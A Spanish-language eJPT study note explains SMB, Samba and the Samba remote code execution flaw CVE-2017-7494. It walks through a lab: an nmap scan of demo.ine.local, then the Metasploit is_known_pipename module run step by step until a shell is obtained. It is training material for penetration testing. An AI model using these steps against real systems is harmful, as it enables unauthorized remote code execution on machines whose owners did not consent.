> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/metasploit-framework-msf/explotacion/explotacion-de-linux/explotando-samba.md).

# Explotando Samba

### 🧭 ¿Qué es SMB?

**SMB** (Server Message Block) es un protocolo de red utilizado para **compartir archivos, impresoras y otros recursos** entre equipos dentro de una red local (LAN).

* Actualmente, SMB opera sobre el **puerto TCP 445**.
* Originalmente, SMB se ejecutaba sobre NetBIOS, utilizando el **puerto 139**.
* Este protocolo es ampliamente utilizado en entornos Windows para compartir recursos entre máquinas.

***

### 🐧 ¿Qué es Samba?

**Samba** es la implementación de SMB para sistemas Linux y Unix.

* Permite a sistemas Windows acceder a **carpetas compartidas y dispositivos** en máquinas Linux.
* Es una herramienta fundamental en redes mixtas (Linux/Windows) para la interoperabilidad entre sistemas.

***

### 🛠️ Vulnerabilidad en Samba v3.5.0 (CVE-2017-7494)

La versión **Samba 3.5.0** es vulnerable a una **ejecución remota de código (RCE)** que permite a un atacante remoto ejecutar comandos en el sistema afectado.

#### 🔥 Características de la vulnerabilidad:

* El atacante puede subir una **biblioteca compartida (`.so`)** maliciosa a una **unidad con permisos de escritura**.
* Luego, puede forzar al servidor Samba a **cargar y ejecutar esa biblioteca**, obteniendo así ejecución remota de código.
* Esta vulnerabilidad es conocida por su simplicidad de explotación y su gran impacto.

***

## 🧪 Laboratorio Práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/tz1R1jC8Xjnjx7j8Xcit" alt=""><figcaption></figcaption></figure>

**Paso 2:** Ejecute un escaneo de Nmap contra el objetivo.

**Dominio:**

```
nmap -sS -sV demo.ine.local
```

**Paso 3:** Hemos descubierto un servidor Samba ejecutándose en la máquina objetivo. Usemos el módulo Metasploit para explotar el objetivo.

**Comandos:**

```
msfconsole -q
use exploit/linux/samba/is_known_pipename
set RHOST demo.ine.local
check
exploit
id
```

<figure><img src="/files/FAW9cP33SYIs4dv8bz3q" alt=""><figcaption></figcaption></figure>

Obtuvimos el shell con éxito.

## Conclusión

En este laboratorio, aprendimos cómo obtener un shell en el objetivo explotando un servicio de intercambio de archivos.
